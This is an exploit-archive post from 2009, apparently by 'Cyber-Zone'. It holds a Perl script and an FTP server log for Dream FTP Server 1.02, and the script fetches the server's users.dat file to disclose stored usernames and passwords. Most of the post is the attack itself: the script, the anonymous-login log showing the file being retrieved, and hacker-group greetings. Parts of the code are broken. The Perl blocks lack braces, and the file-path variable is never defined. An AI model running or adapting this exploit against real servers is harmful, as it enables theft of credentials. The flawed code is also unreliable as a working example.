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Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit
来源:WwW.No-Exploit.CoM 作者:Cyber-Zone 发布时间:2009-04-24  

#!/usr/bin/perl -w
# This Bug Similar to others found By My Friend : Stack <= so special Thanx
# So You Can Exploit Arbitrary File Disclosure From The Server <== You can use Stack's Exploit To do That
# But This Exploit i will get Users & Passwords Of The applicatin From : users.dat : C:\Program Files\BolinTech\users.dat
# In This Exploit I Used The Port 80 You can use any port you want 21
#23/04/2009 13:20:25  FTP Server started on port 80.
#23/04/2009 13:25:43  [0000000002] Client connected from
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220-      Welcome to Dream FTP Server
#23/04/2009 13:25:43  [0000000002] 220-      Copyright 2002 - 2004
#23/04/2009 13:25:43  [0000000002] 220-      BolinTech Inc.
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220- ****************************************
#23/04/2009 13:25:43  [0000000002] 220-
#23/04/2009 13:25:43  [0000000002] 220 
#23/04/2009 13:25:43  [0000000002] USER anonymous
#23/04/2009 13:25:43  [0000000002] 331 Password required for anonymous
#23/04/2009 13:25:43  [0000000002] PASS **********
#23/04/2009 13:25:43  [0000000002] 230 User successfully logged in.
#23/04/2009 13:25:43  [0000000002] PWD
#23/04/2009 13:25:43  [0000000002] 257 "/" is current directory.
#23/04/2009 13:25:43  [0000000002] TYPE I
#23/04/2009 13:25:43  [0000000002] 200 Type set to I
#23/04/2009 13:25:43  [0000000002] CWD Program Files
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files" is current directory.
#23/04/2009 13:25:43  [0000000002] CWD BolinTech
#23/04/2009 13:25:43  [0000000002] 250 "/Program Files/BolinTech" is current directory.
#23/04/2009 13:25:43  [0000000002] MDTM users.dat
#23/04/2009 13:25:43  [0000000002] 502 Command not implemented - Try HELP.
#23/04/2009 13:25:43  [0000000002] PASV
#23/04/2009 13:25:43  [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145).
#23/04/2009 13:25:43  [0000000002] RETR users.dat
#23/04/2009 13:25:43  [0000000002] 150 Opening BINARY mode data connection for file transfer.
#23/04/2009 13:25:43  [0000000002] 226 Transfer complete
#23/04/2009 13:25:43  [0000000002] Client disconnected from
# Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html
# Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers
# welcome To : WwW.Ma-HaxOrZ.CoM/vb <== Is Online
# Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png
use LWP::Simple;
use LWP::UserAgent;

print "\tDream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";

if(@ARGV < 3)
&help; exit();
sub help()
print "[X] Usage : perl $0 HackerName IP Port \n";
print "[X] Exemple : perl $0 Cyber-Zone 80 \n";
($HackerName, $TargetIP, $AttackedPort) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");

print("          ******************************\n");
print("          *             Status         *\n");
print("          ******************************\n");
print("$HackerName , AttaCking The Target : $TargetIP \n");
print("On The Port : $AttackedPort , Just To Get Users/Passwords File :d\n");
$terget1="Program Files";
$temp="/" x 2;
my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;
print("Exploiting .....>    |80\n");
print("Exploiting ..........|Done!\n");
$Disclosure=get $boom;
print("\n\n\n\n............File Contents Are Just Below...........\n");
print("$Disclosure \n");
print("Done For Fun //Figuigian HaCker\n");
print("Some Womens Makes The World Special , Just By Being On it <3\n");

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